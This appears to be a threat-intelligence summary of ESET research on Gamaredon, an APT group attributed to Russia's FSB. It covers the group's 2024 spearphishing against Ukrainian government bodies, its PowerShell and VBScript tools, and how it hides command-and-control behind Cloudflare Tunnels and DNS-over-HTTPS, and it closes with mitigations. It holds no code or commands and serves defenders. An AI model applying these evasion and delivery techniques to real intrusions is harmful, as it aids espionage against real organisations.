Full Report
ESET Research analyzes Gamaredon’s updated cyberespionage toolset, new stealth-focused techniques, and aggressive spearphishing operations observed throughout 2024
Analysis Summary
# Threat Actor: Gamaredon
## Attribution & Identity
Attributed by the Security Service of Ukraine (SSU) to **Russia’s Federal Security Service (FSB), specifically the 18th Center of Information Security**. The actor is a Russia-aligned Advanced Persistent Threat (APT) group focused on cyberespionage.
## Activity Summary
Gamaredon has relentlessly targeted Ukrainian entities since at least 2013. In 2024, the group **refocused exclusively on targeting Ukrainian governmental institutions**, abandoning prior attempts against NATO countries. The scale and frequency of its spearphishing campaigns significantly increased throughout the second half of 2024. The group introduced several new stealth-focused tools and significantly upgraded existing ones to improve persistence and lateral movement against its exclusive targets in Ukraine.
## Tactics, Techniques & Procedures
- **Spearphishing:** Increased frequency, employing malicious archives (RAR, ZIP, 7z) or XHTML files using HTML smuggling.
- **Delivery Methods:** Used malicious HTA or LNK files that executed embedded VBScript downloaders (e.g., PteroSand).
- **Novel Delivery:** Used malicious LNK files to execute PowerShell commands directly from Cloudflare-hosted domains.
- **Infrastructure Evasion:** Heavily relied on Cloudflare Tunnels to hide Command and Control (C&C) infrastructure.
- **C&C Obfuscation:** Leveraged third-party services (Telegram, Telegraph, Dropbox) and DNS-over-HTTPS (DoH) services (Google, Cloudflare) for communication protection.
- **Domain Resolution:** Used embedded HTA and VBScript files dropped into temporary directories to resolve C&C domains separately.
- **Persistence/Lateral Movement:** Updated tools focused on these areas; notable old persistence involved Excel add-ins, while newer methods utilize scheduled tasks.
## Targeting
- Sectors: Governmental institutions.
- Geography: Exclusively **Ukraine** in 2024. Prior years included occasional attempts against NATO countries.
- Victims: Ukrainian governmental institutions.
## Tools & Infrastructure
- **New Malware (2024):**
- **PteroDespair:** PowerShell reconnaissance tool for collecting diagnostic data.
- **PteroTickle:** PowerShell weaponizer that targets Python applications converted to executables for lateral movement, weaponizing Tcl scripts.
- **PteroGraphin:** PowerShell tool initially using Excel add-ins for persistence, using the Telegraph API for encrypted communication, later switching to scheduled tasks.
- **PteroStew:** New general-purpose VBScript downloader.
- **Infrastructure:** Heavily obfuscated C&C infrastructure hidden behind **Cloudflare Tunnels** (using Cloudflare-generated subdomains as primary endpoints). Fallback relied on traditional domains. Used DoH services and third-party resolver websites (nslookup[.]io, who[.]is, dnswatch[.]info, check-host[.]net).
## Implications
Gamaredon remains a highly active and persistent cyberespionage threat, closely aligned with Russian geopolitical motives concerning the conflict in Ukraine. Despite perceived capacity limitations, its commitment to constant toolset evolution, aggressive spearphishing, and sophisticated infrastructure obfuscation (leveraging Cloudflare Tunnels and DoH) makes it difficult to detect and thwart. The exclusive focus on Ukrainian state entities suggests sustained, high-priority intelligence gathering objectives for the foreseeable future.
## Mitigations
- Implement robust detection mechanisms against PowerShell execution originating from non-standard locations or processes, especially those leveraging LNK files for direct execution from cloud-hosted downloaders.
- Monitor for the use of third-party services (Cloudflare, Telegram, Dropbox, Telegraph) for C&C communications.
- Harden endpoint protection against common initial access vectors like malicious archives (RAR, ZIP, 7z) and HTML smuggling techniques.
- Focus monitoring on persistence mechanisms like custom scheduled tasks and suspicious activity related to Microsoft Excel add-ins.